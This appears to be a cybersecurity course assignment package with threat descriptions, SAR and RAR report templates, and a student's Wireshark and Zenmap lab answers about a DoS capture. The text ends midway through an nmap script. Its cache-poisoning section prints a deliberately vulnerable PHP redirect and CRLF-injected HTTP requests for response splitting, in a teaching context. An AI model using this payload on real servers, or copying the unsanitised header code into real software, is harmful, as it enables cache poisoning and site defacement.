Next, examine these resources on firewalls and on auditing related to the use of the Relational Database Management System (RDBMS), the database system, and data. Also review these resources related to access control.
Determine the role of firewalls, encryption, and auditing for RDBMS in protecting information and monitoring the confidentiality, integrity, and availability of the information in the information systems.
Reflect any weaknesses found in the network and information system diagrams previously created, as well as in your developing SAR.
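As one hedged illustration of application-level encryption for sensitive RDBMS fields, here is a minimal Python sketch using the cryptography library's Fernet interface; the column value is hypothetical, and in practice the key would come from a key-management service rather than being generated inline.

# Application-level field encryption sketch using the "cryptography" package.
# In production the key would be retrieved from a key-management service.
from cryptography.fernet import Fernet

key = Fernet.generate_key()        # demonstration only; do not hard-code keys
cipher = Fernet(key)

ssn_plaintext = b"123-45-6789"     # hypothetical sensitive column value
ssn_ciphertext = cipher.encrypt(ssn_plaintext)

# The ciphertext, not the plaintext, is what gets written to the RDBMS column.
print("stored value:", ssn_ciphertext[:40], b"...")

# When an authorized application reads the row, it decrypts the value.
print("recovered value:", cipher.decrypt(ssn_ciphertext).decode())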
Step 6: Threat Identification
Now that you know the weaknesses in your organization’s network and information system, you will determine various known threats to the organization’s network architecture and IT assets.
Get acquainted with the following types of threats and attack techniques. Which are a risk to your organization?
Spoofing/Cache Poisoning Attacks
Spoofing refers to attacks in which a program pretends to be another program so that it can gain unauthorized access. DNS spoofing is a type of spoofing attack that is performed on DNS records. This type of attack can be carried out in various ways, including through cache poisoning, DNS compromising, and man-in-the-middle attacks.
Cache poisoning attacks involve an attack on the cache of the DNS servers and the replacement of one or more target IP addresses with spoofed ones. The attacker loads these addresses with corrupt content and malicious viruses, which affect the users accessing the cached IP addresses on the DNS server.
IP Address Spoofing
In this type of attack, the attacker sniffs network traffic to identify the pattern of legitimate IP addresses for that particular network. The attacker then forges the IP address in the packet headers. If the network uses the IP address to authenticate the user, the attacker is able to gain access to the network through the packet with the forged IP address. The attacker can then send malicious packets to the network. For example, an attacker may introduce a Trojan or keylogging application to the network after gaining access to it.
IP address spoofing is a network layer attack.
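A defensive way to reason about IP address spoofing is ingress filtering: packets arriving from outside should never claim an internal source address. The sketch below (Scapy plus the standard ipaddress module; the capture file and internal ranges are placeholders) flags such packets in a capture taken at the network perimeter.

# Ingress-filtering check: flag external packets that claim internal sources.
# "perimeter.pcap" and the internal ranges are placeholders.
import ipaddress
from scapy.all import rdpcap, IP

INTERNAL_NETS = [ipaddress.ip_network("10.0.0.0/8"),
                 ipaddress.ip_network("192.168.0.0/16")]

def claims_internal_source(src: str) -> bool:
    addr = ipaddress.ip_address(src)
    return any(addr in net for net in INTERNAL_NETS)

for pkt in rdpcap("perimeter.pcap"):
    if pkt.haslayer(IP) and claims_internal_source(pkt[IP].src):
        # On an external-facing capture, these sources are likely spoofed.
        print("possible spoofed packet:", pkt[IP].src, "->", pkt[IP].dst)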
Cache Poisoning
Description
The impact of a maliciously constructed response can be magnified if it is cached either by a web cache used by multiple users or even the browser cache of a single user. If a response is cached in a shared web cache, such as those commonly found in proxy servers, then all users of that cache will continue to receive the malicious content until the cache entry is purged. Similarly, if the response is cached in the browser of an individual user, then that user will continue to receive the malicious content until the cache entry is purged, although only the user of the local browser instance will be affected.
To successfully carry out such an attack, an attacker:
· Finds the vulnerable service code, which allows them to fill the HTTP header field with many headers.
· Forces the cache server to flush its actual cache content, which we want to be cached by the servers.
· Sends a specially crafted request, which will be stored in cache.
· Sends the next request. The previously injected content stored in cache will be the response to this request.
This attack is rather difficult to carry out in a real environment. The list of conditions is long and hard to accomplish by the attacker. However it’s easier to use this technique than Cross-User Defacement.
A Cache Poisoning attack is possible because of HTTP Response Splitting and flaws in the web application. It is crucial from the attacker’s point of view that the application allows for filling the header field with more than one header using CR (Carriage Return) and LF (Line Feed) characters.
Examples
We have found a web page, which gets its service name from the “page” argument and then redirects (302) to this service.
e.g. http://testsite.com/redir.php?page=http://other.testsite.com/
And example code of redir.php:
rezos@dojo ~/public_html $ cat redir.php
<?php
header("Location: " . $_GET['page']);
?>
Crafting appropriate request:
1. Remove page from the cache
GET http://testsite.com/index.html HTTP/1.1
Pragma: no-cache
Host: testsite.com
User-Agent: Mozilla/4.7 [en] (WinNT; I)
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
image/png, */*
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8
HTTP header fields Pragma: no-cache or ‘Cache-Control: no-cache’ will remove the page from cache (if the page is stored in cache, obviously).
2. Using HTTP Response Splitting we force cache server to generate two responses to one request
GET http://testsite.com/redir.php?site=%0d%0aContent-
Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aLast-
Modified:%20Mon,%2027%20Oct%202009%2014:50:18%20GMT%0d%0aConte
nt-Length:%2020%0d%0aContent-
Type:%20text/html%0d%0a%0d%0adeface! HTTP/1.1
Host: testsite.com
User-Agent: Mozilla/4.7 [en] (WinNT; I)
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
image/png, */*
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8
We are intentionally setting the future time (in the header it’s set to 27 October 2009) in the second response HTTP header “Last-Modified” to store the response in the cache.
We may get this effect by setting the following headers:
· Last-Modified (checked by the If-Modified-Since header)
· ETag (checked by the If-None-Match header)
3. Sending request for the page, which we want to replace in the cache of the server
GET http://testsite.com/index.html HTTP/1.1
Host: testsite.com
User-Agent: Mozilla/4.7 [en] (WinNT; I)
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
image/png, */*
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8
In theory, the cache server should match the second answer from the request #2 to the request #3. In this way we’ve replaced the cache content.
The rest of the requests should be executed during one connection (if the cache server doesn’t require a more sophisticated method to be used), possibly immediately one after another.
It may appear problematic to use this attack as a universal technique for cache poisoning. This is due to differences in cache servers’ connection models and request processing implementations. What does this mean? For example, an effective method to poison the Apache 2.x cache with the mod_proxy and mod_cache modules won’t work with Squid.
A different problem is the length of the URI, which sometimes makes it impossible to insert the necessary response header, which would then be matched to the request for the poisoned page.
The request examples used are from http://packetstormsecurity.org/papers/general/whitepaper_httpresponse by Amit Klein, Director of Security and Research, and were modified for the needs of this article.
Denial-of-Service Attacks (DoS)
Denial-of-service (DoS) attacks are cyberattacks aimed at making resources (or services) unavailable to users. DoS attacks are implemented through either the exploitation of limitations of communication and application protocols, or an attack on the server involving the transmission of an extensive number of requests meant to overload the server and exhaust its resources.
DoS attacks and their detection are discussed in the guidelines document of the National Institute of Standards and Technology (Scarfone & Hoffman, 2009). They typically lead to significantly increased bandwidth usage or a much larger-than-usual number of packets or connections sent to or from a particular host. Anomaly detection methods can involve monitoring bandwidth or packet or connection numbers and determining whether observed activity is significantly different from expected activity.
The effects of DoS attacks can be mitigated with the installation of appropriate software and the throttling of bandwidth usage.
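The anomaly-detection idea described above can be sketched very simply: compare current connection counts against a baseline and flag values far outside normal variation. The Python example below uses hypothetical per-minute connection counts and a mean-plus-three-standard-deviations threshold.

# Simple threshold-based anomaly detection on connection counts per minute.
# The baseline and current values are hypothetical monitoring data.
from statistics import mean, stdev

baseline = [120, 135, 128, 140, 131, 126, 138, 129]   # normal minutes
threshold = mean(baseline) + 3 * stdev(baseline)

current_minutes = {"09:01": 133, "09:02": 141, "09:03": 5240}
for minute, connections in current_minutes.items():
    if connections > threshold:
        print(f"{minute}: {connections} connections - possible DoS activity")
    else:
        print(f"{minute}: {connections} connections - within normal range")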
References
Scarfone, K., & Hoffman, P. (2009). Guidelines on firewalls and firewall policy: Recommendations of the National Institute of Standards and Technology (Special Publication 800-41). National Institute of Standards and Technology. http://csrc.nist.gov/publications/nistpubs/800-41-Rev1/sp800-41-rev1
Packet Analysis/Sniffing
Sniffing is performed by packet sniffers or network analyzers, which monitor data streams and capture packets for decoding and examination.
According to the National Institute of Standards and Technology (NIST):
Packet sniffers are designed to monitor network traffic on wired or wireless networks and capture packets. Packet sniffers generally can be configured [to direct] the sniffer to capture all packets or only those with particular characteristics (e.g., certain TCP ports, certain source or destination IP addresses). Most packet sniffers are also protocol analyzers, which means that they can reassemble streams from individual packets and decode communications that use any of hundreds or thousands of different protocols (Mell et al., 2005).
Packet sniffing is performed for several beneficial purposes, which include identifying suspicious activities, finding corrupted or erroneous packets, and analyzing and improving system efficiency. It is, however, also used by hackers for attacking, spying, and collecting information.
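As a small sketch of configuring a sniffer to capture only packets with particular characteristics, as the NIST description above notes, the Scapy snippet below captures a handful of packets matching a BPF filter. It must be run with sufficient privileges and a working libpcap backend; the filter shown is a hypothetical example.

# Capture only packets with particular characteristics (here, MySQL traffic).
# Requires administrative privileges; the filter is a hypothetical example.
from scapy.all import sniff

def summarize(pkt):
    # Print a one-line summary of each captured packet.
    print(pkt.summary())

# The BPF filter restricts capture to TCP traffic on port 3306.
sniff(filter="tcp port 3306", prn=summarize, count=10)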
References
Mell, P., Kent, K., & Nusbaum, J. (2005).
Guide to malware incident prevention and handling: Recommendations of the National Institute of Standards and Technology. (Special Publication 800-83). National Institute of Standards and Technology. US Department of Commerce. http://csrc.nist.gov/publications/nistpubs/800-83/SP800-83
Session Hijacking Attacks
When an attacker obtains unauthorized access to a user’s session ID or key, the attacker is able to masquerade as the user to access websites. This process is known as session hijacking. The session ID is stored in the cookie and can be stolen using several methods, including sniffing, software codes, and Trojans.
Though it is not easy to identify session hijacking attacks, users can take some precautions to prevent it. Some common steps include using sessions with secure SSL certificates, setting timeouts for sessions, and preventing JavaScripts from accessing session cookies.
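The precautions listed above map directly onto web-framework settings. The sketch below shows how they might look in a Flask application (an illustrative choice, not prescribed by the project): the session cookie is marked Secure and HttpOnly so it is only sent over SSL/TLS and cannot be read by JavaScript, and sessions time out after a short period.

# Hardening session cookies in a (hypothetical) Flask application.
from datetime import timedelta
from flask import Flask

app = Flask(__name__)
app.secret_key = "replace-with-a-random-secret"   # placeholder only

app.config.update(
    SESSION_COOKIE_SECURE=True,     # cookie only sent over HTTPS (SSL/TLS)
    SESSION_COOKIE_HTTPONLY=True,   # JavaScript cannot read the session cookie
    SESSION_COOKIE_SAMESITE="Lax",  # limits cross-site sending of the cookie
    PERMANENT_SESSION_LIFETIME=timedelta(minutes=15),  # session timeout
)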
Man-in-the-Middle Attacks
In a man-in-the-middle (MITM) attack, the attacker secretly positions themselves between two communicating parties and intercepts, and possibly alters, the traffic while each party believes it is communicating directly with the other. MITM attacks are commonly carried out through techniques such as ARP spoofing, rogue access points, and DNS spoofing, and they can be mitigated with strong mutual authentication and encrypted channels such as TLS.
Distributed Denial-of-Service Attacks
Like denial-of-service (DoS) attacks, distributed denial-of-service (DDoS) attacks are cyberattacks that intend to exhaust network resources. DDoS attacks, however, are launched from several (possibly hundreds or thousands of) devices, which are connected to each other, but distributed over the internet. Hence, a large number of devices simultaneously attack the network infrastructure (as opposed to the single device used in DoS attacks).
Common types of DDoS attacks include bandwidth, traffic, and application attacks. DDoS attacks are harder to prevent and mitigate than DoS attacks, as the multiple attack sources create a large volume of traffic in a short period of time.
In identifying the different threats, complete the following tasks:
1. Identify the potential hacking actors of these threat attacks on vulnerabilities in networks and information systems, as well as the types of remediation and mitigation techniques available in your industry and for your organization.
2. Identify the purpose and function of firewalls for organization network systems and how they address the threats and vulnerabilities you have identified.
3. Discuss the value of using access control, database transaction, and firewall log files.
4. Identify the purpose and function of encryption as it relates to files, databases, and other information assets on the organization’s networks.
Include these in your SAR.
Step 7: Risk and Remediation
What is the risk and what is the remediation? What is the security exploitation? You can use the OPM OIG Final Audit Report findings and recommendations as a possible source for methods to remediate and mitigate vulnerabilities.
Read the risk assessment resource to get familiar with the process, then prepare a risk assessment. Be sure to first list the threats, then the vulnerabilities, and then the pairwise comparisons for each threat and vulnerability. Then determine the likelihood of each event occurring and the level of impact it would have on the organization.
Include this in your risk assessment report (RAR).
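One lightweight way to organize the likelihood and impact determinations is a simple risk matrix. The Python sketch below (with hypothetical threat-vulnerability pairs and ratings) multiplies likelihood by impact to produce a rank-ordered list you could adapt for the RAR.

# Hypothetical threat-vulnerability pairs scored for a simple risk matrix.
# Likelihood and impact use a 1 (low) to 5 (high) scale.
pairs = [
    {"threat": "Credential theft", "vulnerability": "Weak authentication", "likelihood": 4, "impact": 5},
    {"threat": "Insider data exfiltration", "vulnerability": "Excessive privileges", "likelihood": 3, "impact": 4},
    {"threat": "DoS attack", "vulnerability": "No traffic throttling", "likelihood": 2, "impact": 3},
]

for pair in pairs:
    pair["risk"] = pair["likelihood"] * pair["impact"]

# Rank from highest to lowest risk for the remediation discussion.
for pair in sorted(pairs, key=lambda p: p["risk"], reverse=True):
    print(f'{pair["risk"]:>2}  {pair["threat"]} / {pair["vulnerability"]}')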
Step 8: Creating the SAR and RAR
Your research and your Workspace exercise have led you to this moment: creating your SAR and RAR. Consider what you have learned in the previous steps as you create your reports for leadership.
Prepare a Security Assessment Report (SAR) with the following sections:
1. Purpose
2. Organization
3. Scope
4. Methodology
5. Data
6. Results
7. Findings
The final SAR does not have to stay within this framework and can be designed to fulfill the goal of the security assessment.
Prepare a risk assessment report (RAR) with information on the threats, vulnerabilities, likelihood of exploitation of security weaknesses, impact assessments for exploitation of security weaknesses, remediation, and cost/benefit analyses of remediation.
Devise a high-level plan of action with interim milestones (POAM) in a system methodology to remedy your findings.
Include this high-level plan in the RAR.
Summarize the results you obtained from the OpenVAS vulnerability assessment tool in your report.
The deliverables for this project are as follows:
1. Security Assessment Report (SAR): This should be an eight- to ten-page double-spaced Word document with citations in APA format. The page count does not include figures, diagrams, tables, or citations.
2. Risk Assessment Report (RAR): This report should be a five- to six-page double-spaced Word document with citations in APA format. The page count does not include figures, diagrams, tables, or citations.
3. Lab: In a Word document, share your lab experience and provide screenshots to demonstrate that you performed the lab.
Project 2 – Assessing Information System Vulnerabilities and Risk
Security Assessment Report (SAR)
CST 610: Cyberspace and Cybersecurity Foundations
{Your Name}
[date]
Professor – Section
University
SECURITY ASSESSMENT REPORT
TISTA Science & Technology Corporation
[Period of Assessment]
[Report Date]
SECURITY ASSESSMENT
1. Background
1.1 Purpose [Use the lead-in material from Project 2 “Start Here” and the project summary scenario to clearly focus the goal and purpose of the SAR]
1.2 Description of TISTA Science & Technology Corporation
1. Describe your company.
· Mission: To deliver the highest quality IT professional services and innovative solutions to the Federal, State, and Local government.
· TISTA Science & Technology Corporation provides a wide range of services, including Application Engineering, Consulting, Cybersecurity, Data Science, Infrastructure, and Mobility support, in the Health, Defense, and Civilian sectors.
2. What is your business sector, and how does that affect your security?
· Science and Technology
·
3. How might the organizational structure of your company affect security?
1.3 Networks in TISTA Science & Technology Corporation
[Base the description of your network and the critical information systems you decide to include on your work in Step 1.] Particularly as they apply to the company’s relational database management system (RDBMS), here are areas and questions that you might include:
1. Provide network architecture diagrams for the local area network (LAN) and wide area network (WAN) for your company.
2. Indicate the critical information systems in these diagrams and explain their importance.
3. What external systems and users connect to your company?
4. Where is data at rest, in motion and in use?
5. Can you identify important system and network security boundaries and regions?
6. Discuss the security benefits and deficiencies of your chosen network design. (Include tables and diagrams as appropriate) [Your focus should be on the RDBMS and systems, connectivity, auditing, protection, such as encryption and access control, … related to the RDBMS applications]
2. Assessment Approach
[You have been asked whether the OPM breach could happen at your company. Describe the approach to your assessment based on the security posture of your company from the description above and on the lab testing, comparing that posture to the threats encountered in the OPM breach.]
2.1 Approach
2.2 Review of the OPM Breach(es)
2.3 Relevance of the OPM Breach(es) to [Your Company Name]
2.4 Completed or In Progress Assessments (i.e., simply identify your current and prior lab tests in this and prior classes and any prior SAR completed for this company. Do not include results here.)
2.5 Scope Covered in the Assessment (include why)
3. Assessment Results[footnoteRef:1] [1: For critical system(s), information, networks and interfaces to external systems and users.]
3.1 Insider Threats
Threat | Synopsis | Impact[footnoteRef:2] [2: Quantify or provide recent relevant examples or incidents of business, safety, health… impact.]
3.2 External Threats
Threat | Synopsis | Impact2 | Impact Level (H, M, L)
3.3 Vulnerabilities[footnoteRef:3] [3: Include results from all lab testing (e.g., network monitoring and assessment and prior OS assessments and password cracking assessments. Provide details including tools in Synopsis and Lab Reports in Appendices.]
Vulnerability | Synopsis | Impact2 | Impact Level (H, M, L)
4. Assessment Results
4.1 Rank Ordered Threats and Vulnerabilities (Most to Least Impact)
ID[footnoteRef:4] [4: ID: You may wish to label categories as S=System, N=Network, I=Interface, D=Data or Information and give number in each category (e.g., S1, S2, N1, D1) for unambiguous referencing.] | Impact Level (H, M, L) | Threat or Vulnerability1 | Current Security Posture | Deficiencies in Current Posture
5. Notes and Comments
______________________________ _________________
Principal Assessor Date
[Enter your name and date as would be done in a real SAR.]
SUMMARY OF REFERENCES
Provide your summary list of references using proper APA format. (Remember: You must also use in-line citations with proper APA format throughout the report.)
APPENDICES
Place your lab report and screenshots here.
[The lab is to be treated as your specific testing and checking of your company’s critical information systems and the topics you are writing about. It is not a theoretical exercise, nor is it independent of and separate from our topic and scenario. Provide screenshots of the tools and results from your lab experiences, and answer any lab questions. Many students take the lab directions, eliminate everything but the section headings and questions, and in each section write down what was asked for, what the results show, and how they relate to a topic in the main report; they then insert the screenshots obtained and point to or write out the specific key data result(s) within each screenshot.
Your specific insights, comparisons and results from the analysis of the lab data should be identified and used within the report and tables, above.
Note: A great tool for capturing your screenshots from the lab is the Snipping Tool, which is included with Microsoft Windows.]
Project 2 – Assessing Information System Vulnerabilities and Risk
Risk Assessment Report (RAR)
CST 610: Cyberspace and Cybersecurity Foundations
{Your Name}
[date]
Professor – Section
University
RISK ASSESSMENT REPORT
TISTA Science & Technology Corporation
[Period of Assessment]
[Report Date]
RISK ASSESSMENT
[Note: Parts of the RAR will normally contain material found in the SAR. Feel free to reuse that SAR material, as is, here.]
1. Background[footnoteRef:1] [from the SAR] [1: Reference Security Assessment Report for Background.]
1.1 Purpose [Use the lead-in material from Project 2 “Start Here” and the project summary scenario to clearly focus the goal and purpose of the RAR]
1.2 Description of TISTA Science & Technology Corporation
1. Describe your company.
· Mission: To deliver the highest quality IT professional services and innovative solutions to the Federal, State, and Local government.
· TISTA Science & Technology Corporation provides a wide range of services, including Application Engineering, Consulting, Cybersecurity, Data Science, Infrastructure, and Mobility support, in the Health, Defense, and Civilian sectors.
2. What is your business sector, and how does it affect your security?
· Science and Technology
3. How might the organizational structure of your company affect security?
1.3 Networks in TISTA Science & Technology Corporation
[Base the description of your network and the critical information systems you decide to include on your work in Step 1.] Particularly as they apply to the company’s relational database management system (RDBMS), here are areas and questions that you might include:
1. Provide network architecture diagrams for the local area network (LAN) and wide area network (WAN) for your company.
2. Indicate the critical information systems in these diagrams and explain their importance.
3. What external systems and users connect to your company?
4. Where is data at rest, in motion and in use?
5. Can you identify important system and network security boundaries and regions?
6. Discuss the security benefits and deficiencies of your chosen network design. (Include tables and diagrams as appropriate) [Your focus should be on the RDBMS and systems, connectivity, auditing, protection, such as encryption and access control, … related to the RDBMS applications]
2. Risk Assessment Approach
2.1 Risk Assessment Methods
Method | Synopsis
2.2 Model(s) and Method(s) Employed
Include:
· Reference standards and industry best practices, models and methods employed.
· Diagrams and/or tables showing how risks will be presented to executives and others
· How risks will be quantified (one illustrative sketch follows this list)
· The probabilities of insider and external threats occurring and the probabilities of them being successful incidents relative to technical and physical vulnerabilities to critical system(s), information, networks and interfaces to external systems and users.
· The business impact of the threats.
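[For illustration only: one common way to quantify risk is annualized loss expectancy (ALE = single loss expectancy x annual rate of occurrence). The short Python sketch below uses hypothetical risks and dollar figures, not company data.]

# Hypothetical sketch of quantifying risk with annualized loss expectancy
# (ALE = single loss expectancy x annual rate of occurrence).
# All descriptions and figures below are illustrative assumptions, not company data.
risks = [
    # (description, single_loss_expectancy_usd, annual_rate_of_occurrence)
    ("Credential-theft breach of the RDBMS", 500_000, 0.3),
    ("Ransomware on file servers", 200_000, 0.5),
    ("Insider data exfiltration", 350_000, 0.1),
]

# Rank the risks from highest to lowest annualized loss expectancy.
for description, sle, aro in sorted(risks, key=lambda r: r[1] * r[2], reverse=True):
    ale = sle * aro
    print(f"ALE ${ale:>10,.0f} | {description} (SLE=${sle:,}, ARO={aro})")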
3. Assessment Results1,[footnoteRef:2] [2: For critical system(s), information, networks and interfaces to external systems and users. Reference Security Assessment Report for threats and vulnerabilities.]
3.1 Insider Threats
Threat1 | Synopsis | Impact | Probability
3.2 External Threats
Threat1 | Synopsis | Impact | Probability
3.3 Vulnerabilities
Vulnerability1 | Synopsis | Impact | Probability
4. Assessment Results
4.1 Rank Ordered Risk Levels (Highest to Lowest)
ID[footnoteRef:3] [3: ID: You may wish to label categories as S=System, N=Network, I=Interface, D=Data or Information and give number in each category (e.g., S1, S2, N1, D1) for unambiguous referencing.] | Risk Level | Threat or Vulnerability1 | Current Security Posture | Potential Security Measures | Estimated Cost of Each
4.2 Plan of Action with Interim Milestones (POAM)
[Summarize your recommended high-level plan of action to remedy your findings in the order to be addressed in the table.]
Risk ID2 | Risk Level | Threat or Vulnerability1 | Recommended Security Measure | Estimated Cost | Risks Involved in Implementation
5. Notes and Comments
______________________________ _________________
Principal Assessor Date
SUMMARY OF REFERENCES
Provide your summary list of references using proper APA format. (Remember: You must also use in-line citations with proper APA format throughout the report.)
CST Lab Experience Report
Use this lab experience report template to document your findings from the lab and make sure to complete all required actions in each step of the lab and respond to all questions. The template is designed to be used as a guide for your lab and not necessarily a project requirement.
ADDITIONAL LAB GUIDANCE
Below is a list of additional guidance and/or recommendations for your lab experience report:
· Completing the labs: All sections or parts of the labs should be completed as required.
· Answering the lab questions: You are required to answer all the lab questions (if any).
· Taking screenshots: While taking screenshots is recommended in your lab, try to limit them and only focus on the applicable ones to support your lab report.
· Writing your lab experience report: You are required to write a summary of the lab experience report based on your findings and incorporate them into your final deliverables.
· File name convention: Please change the generic file name of this template to reflect part of your name, the course ID, or the project/lab title.
· e.g. 1: CST610 Project 2 Lab-Network Traffic Capture and Analysis
· e.g. 2: CST610 Project 2 Lab-Network Traffic Capture and Analysis—John Doe
· e.g. 3: CST610-Project 2 Lab_Network Traffic Capture and Analysis (7/15/22)
In compiling your findings, think of how your experience performing the labs relates to the overall project goals. You are required to collect information from the lab to understand potential vulnerabilities and other security challenges, analyze it, create your lab report, and incorporate the key components into the final project report.
Please pay close attention to each item above and use it as a supplemental guide alongside the project requirements. Finally, note that successfully completing the lab is important for achieving the overall project goals.
THE REQUIRED LAB QUESTIONS
In this lab, you acted as a security operations analyst: the CIO asked you to analyze the captured network packets and investigate the potential target hosts, the inbound and outbound traffic, and specific types of attacks such as DDoS or SQL injection. Additionally, you were asked to include in your findings whether this is an active or passive sniffing attack. It is imperative to gain a deeper understanding of network security concepts by capturing and analyzing network packets traversing specified endpoints or networks. In other words, you have gained hands-on experience running vulnerability analysis tools that can help detect potential weaknesses in a system. Based on the knowledge and experience gained from the lab, answer the following questions.
PART 2—TASK 4: Filtering, Inspecting, and Analyzing Packet Capture with Wireshark
1. Consider that a DoS attack tries to make a web resource unavailable to legitimate users by flooding the target URL/host with more requests than the server can handle. What can you infer from the statistical information in the Destinations and Ports window as far as a DoS attack is concerned?
Figure 1. Destinations and Ports for 192.168.10.111
Figure 2. Destinations and Ports for 192.168.10.101
A denial-of-service attack involves denying legitimate users access to systems and/or data by flooding the system with heavy loads of erroneous traffic that occupies the majority of the computer’s available resources (Ferguson, 2021). Figures 1 and 2 show a large volume of packets: over 40,000 for 192.168.10.101 and nearly 1.9 million for 192.168.10.111. From the high counts in the Destinations and Ports window, I infer that an active DoS attack is underway.
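As a cross-check on the Wireshark statistics, the per-destination packet counts could also be reproduced with a short script. The sketch below assumes Python with Scapy and a placeholder capture file name (capture.pcap); it is illustrative and not part of the prescribed lab steps.

# Sketch: count packets per destination IP from the capture with Scapy
# (pip install scapy). "capture.pcap" is a placeholder file name.
from collections import Counter
from scapy.all import IP, PcapReader

dst_counts = Counter()
with PcapReader("capture.pcap") as pcap:  # placeholder capture file
    for pkt in pcap:
        if IP in pkt:
            dst_counts[pkt[IP].dst] += 1

# A single destination receiving a disproportionate share of the traffic is one
# indicator consistent with a DoS flood.
for dst, count in dst_counts.most_common(5):
    print(f"{dst:15} {count:>10} packets")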
2. Cybercriminals can illegitimately use DoS attacks to extort money from companies. They may also use ransomware via social engineering. Determine whether this is a Distributed Denial of Service (DDoS) or a DoS attack [hint: a DDoS attack originates from multiple sources almost simultaneously].
Figure 3. Destinations and Ports
Figure 3 indicates that 192.168.10.111 and 192.168.10.101 both have large volumes of packets. 192.168.10.111 is the host IP address and 192.168.10.101 is the source of the attack. This is a DoS attack and not a DDoS attack; if it were a DDoS attack, we would see many originating addresses and a single recipient (Fidele, 2020).
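One way to make the DoS-versus-DDoS distinction explicit is to count how many distinct sources are sending to the suspected victim. The sketch below again assumes Scapy and a placeholder capture file name.

# Sketch: count distinct sources that send to the suspected victim
# (192.168.10.111). Uses Scapy; "capture.pcap" is a placeholder file name.
from collections import Counter
from scapy.all import IP, PcapReader

VICTIM = "192.168.10.111"
src_counts = Counter()
with PcapReader("capture.pcap") as pcap:  # placeholder capture file
    for pkt in pcap:
        if IP in pkt and pkt[IP].dst == VICTIM:
            src_counts[pkt[IP].src] += 1

# One dominant source suggests DoS; many simultaneous sources suggest DDoS.
print(f"Distinct sources targeting {VICTIM}: {len(src_counts)}")
for src, count in src_counts.most_common(10):
    print(f"{src:15} {count:>10} packets")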
3. What is your point of view of the Rate and Percent columns of the Statistics output with respect to the Count column? Does this information indicate any possibility of a compromise? If so, why?
These rates and statistics can point us to the targeted ports and addresses. In Figure 1, 100% of the packets are destined for 192.168.10.111: UDP traffic uses port 50, and 99.75% of the packets are TCP on port 80. These results show that UDP port 50 and TCP port 80 on the host IP are the targets of this DoS attack.
4. Besides the DDoS attack, do you see any indication of other attacks, such as brute force or SQL injection, upon analyzing the web traffic? Why or why not?
Figure 4. Password
The traffic does not indicate a brute force attack. There were multiple requests to recover passwords, as shown in Figure 4, and each request returned HTTP/1.1 404 Not Found. The URL not being found could mean that the server is offline or unreachable due to the DoS attack. SQL injection involves exploiting weaknesses in SQL code by injecting faulty code into the query. Looking at the GET requests, I did not see the indicative 1=1 or 1=2 comparisons, Boolean commands, or any other URL manipulation.
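A scriptable way to double-check the GET requests for common SQL injection indicators is sketched below; the regular-expression patterns and the capture file name are illustrative assumptions, not an exhaustive detection rule.

# Sketch: flag HTTP GET requests whose payloads contain common SQL-injection
# indicators. The patterns and "capture.pcap" file name are illustrative only.
import re
from scapy.all import PcapReader, Raw, TCP

SQLI_PATTERNS = re.compile(rb"(\b1=1\b|\b1=2\b|union\s+select|'\s*or\s*')", re.IGNORECASE)

with PcapReader("capture.pcap") as pcap:  # placeholder capture file
    for pkt in pcap:
        if TCP in pkt and Raw in pkt and pkt[TCP].dport == 80:
            payload = bytes(pkt[Raw].load)
            if payload.startswith(b"GET") and SQLI_PATTERNS.search(payload):
                # Print only the request line of any suspicious GET request.
                print(payload.split(b"\r\n", 1)[0].decode(errors="replace"))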
5. How is this indication different from the Statistics information retrieved earlier and from the perspective of this attack?
Figure 5. Conversations Menu
Figure 5 shows that 192.168.10.101 sent more than 1.9 million packets to 192.168.10.111. The Conversations menu does not show the ports, but it does let you look at UDP and TCP independently of each other. The Conversations menu indicates who the source and the destination are; the Destinations and Ports menu does not.
6. What legitimate or illegitimate role does the host/user with the 192.168.10.111 IP address play in the suspected attack?
The data indicates that 192.168.10.101 initiated the attack by sending illegitimate packet traffic to 192.168.10.111. The attacker is on the same network, so the host’s role is to reply to the packet requests, which in turn floods the server with illegitimate traffic, overloading it and thereby denying legitimate users access to the system.
7. If malicious actors got into your network to access your network security logs, how could they use the packet details to their advantage? Specifically, what utilities within Wireshark can you count on?
From the packet details, a bad actor could learn that we are vulnerable through Telnet, which is insecure, and they may choose to exploit that. It is also possible that these packet details include usernames and/or passwords (Grimmick, 2021). We can count on Wireshark’s ability to sniff out and capture these intrusions so that we may harden our security posture to prevent future attacks and mitigate present threats.
8. From the details of the packet details pane above, why do you think there are several ICMP destination ports unreachable? Does this suggest an indication of an attack? Please comment on your observations.
Figure 6. ICMP
Figure 6 indicates a large volume of ICMP requests resulting in “Destination unreachable (Port unreachable)” responses. This is indicative of a DoS attack (Firch, 2021). The requests are pings that check whether a port is open or closed; the sheer volume is what defines the DoS attack and slows the system.
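The volume of port-unreachable responses can also be tallied directly from the capture. The sketch below assumes Scapy and a placeholder capture file name.

# Sketch: tally ICMP "destination unreachable / port unreachable" messages
# (ICMP type 3, code 3), a pattern consistent with a UDP flood.
# "capture.pcap" is a placeholder file name.
from scapy.all import ICMP, PcapReader

unreachable = 0
with PcapReader("capture.pcap") as pcap:  # placeholder capture file
    for pkt in pcap:
        if ICMP in pkt and pkt[ICMP].type == 3 and pkt[ICMP].code == 3:
            unreachable += 1

print(f"ICMP port-unreachable messages: {unreachable}")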
PART 2—TASK 5, 6: Scanning Multiple Hosts and Networks with Zenmap
1. What is your opinion about the results and the security implications of the output of this tab? Comment on the data of interest in your findings such as host status and ports used.
Figure 7. Ports/Host
The security implications here are concerning. From the results, a bad actor can ascertain which ports are open and which protocols and services are in use, as shown above. Port 22 is wide open with SSH, which is a vulnerability we found in the first project. A potential attacker could use this data to determine our vulnerabilities and exploit them.
2. How many ports are reported by the scans, and how many of them are open?
Figure 8. Ports Open
Figure 8 shows 1,000 ports scanned in total, 12 of which are open.
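For comparison, a similar port summary can be produced outside Zenmap. The sketch below assumes the python-nmap wrapper (with Nmap installed) and uses the lab subnet as a stand-in target range; it is illustrative rather than a required lab step.

# Rough sketch using the python-nmap wrapper (pip install python-nmap; Nmap
# itself must be installed). The /24 target range mirrors the lab subnet and is
# an assumption for your own network.
import nmap

scanner = nmap.PortScanner()
scanner.scan(hosts="192.168.10.0/24", arguments="-sT --top-ports 1000")

for host in scanner.all_hosts():
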